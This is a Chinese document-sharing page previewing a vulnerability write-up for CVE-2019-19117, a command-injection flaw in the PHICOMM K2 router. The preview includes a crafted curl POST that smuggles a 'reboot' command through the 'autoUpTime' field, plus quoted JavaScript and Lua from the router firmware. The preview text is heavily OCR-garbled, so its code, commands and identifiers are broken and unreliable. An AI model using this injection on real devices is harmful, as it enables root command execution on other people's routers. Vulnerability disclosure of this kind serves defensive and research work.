欢迎来到第一文库网! | 帮助中心 第一文库网-每个人都是第一
第一文库网
全部分类
  • 研究报告>
  • 学术论文>
  • 全科教育>
  • 应用文档>
  • 行业资料>
  • 企业管理>
  • 技术资料>
  • 生活休闲>
  • ImageVerifierCode 换一换
    首页 第一文库网 > 资源分类 > DOCX文档下载
    分享到微信 分享到微博 分享到QQ空间

    (CVE-2019-19117)PHICOMM 远程代码执行.docx

    • 资源ID:794888       资源大小:16.75KB        全文页数:2页
    • 资源格式: DOCX        下载积分:3金币
    快捷下载 游客一键下载
    账号登录下载
    微信登录下载
    三方登录下载: QQ登录 微博登录
    二维码
    扫码关注公众号登录
    下载资源需要3金币
    邮箱/手机:
    温馨提示:
    快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。
    如填写123,账号就是123,密码也是123。
    支付方式: 支付宝    微信支付   
    验证码:   换一换

    加入VIP,免费下载
     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    (CVE-2019-19117)PHICOMM 远程代码执行.docx

    (CVE-2019-19117)PHICoMM远程代码执行一、漏洞简介通过修改HTTPPOSt请求中的内容,在根Shen上远程执行命令。二、漏洞影响PHIC0MMK2(PSG1218)V22.5.9.163三、复现过程受影响的源代码文件:usr1ib1ua1uciCOntroIIei'adminautoupgrade.1ua受影响的函数:SaVe()漏洞详情首先,在通过Web登录身份验证,会话劫持漏洞或弱凭据破解攻击以获取访问权限后,向设备发送精心制作的数据包cur1-i-s-k-v-X'POST'-e',http:/192.168.2.1cgi-bin1uci;stok=xxxxxxx×xxxx"-b"sysauth=4a2c4bdba5fb1273ce62759fd42dba42"-data-binary"mode=1&autoUpTime=02%3A051reboot"'http:/192.168.2.1/cgi-bin/1uci/;stok=xx×admin×x××xxxx×,在此http数据包中,我们将要执行“重新引导”的命令添加到数据包内容中。Jj%qnq,i$("#WanCheCkmodaI").moda1("show");$(N#autoUpTimeM)va1($("#uptImehourN)va1()":"$(M#uptimeminM).va1();SetTimeout(fnction()document.save.submit();,1O);我们可以看到,将'autoUpTime,的值直接分配给变量,而无需检查该值是否被恶意修改,然后发送给服务器。functionsve()1oca1time=1uci.http.forRva1ue(',autoUpTtRe")1oca1node«Iuct.http.forRva1ue('node")1oca1upgrading="1"ifnode=*1then1uct.sys.c11(uctsetsytteR.autoupgrade.up.ttne>%s"%tine)Iuct.sys.ca11(Muctsetsysten.autoupgrade.uptype6(a)1uct.sys.ca11(NuctC0Rttsystem,)SChedu1etask.settaskatr(systen"rHautoupgradeM,w1tbautoupgrade.sh"9"yesM,m16","uptine,)SChedu1etask.cfgscdutskby1a(,add,*/system*/(autoupgrdde,)e1setfnode="then1uct.sys.ca11(Nuctsetsysten.utouprde.up-type1")1uct.sys.ca11(,uctCoRnttsyste,t)Schedu1etask.cfgscdutskby1ua("de1,/systen"/,utoupgrde")end1uci.http.redtrect(Iuct.dispatcher.but1daurICadntnM,"nore_syssetM/'autoupradeM),(node=Rde,upgradingupgrading)end然后,服务器直接将数据附加到命令,而无需检查数据是否也被恶意修改,从而使攻击者想要执行的命令附加到该命令。最后,路由器将执行命令"reboot

    注意事项

    本文((CVE-2019-19117)PHICOMM 远程代码执行.docx)为本站会员(lao****ou)主动上传,第一文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知第一文库网(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服 - 联系我们

    copyright@ 2008-2022 001doc.com网站版权所有   

    经营许可证编号:宁ICP备2022001085号

    本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有,必要时第一文库网拥有上传用户文档的转载和下载权。第一文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知第一文库网,我们立即给予删除!



    收起
    展开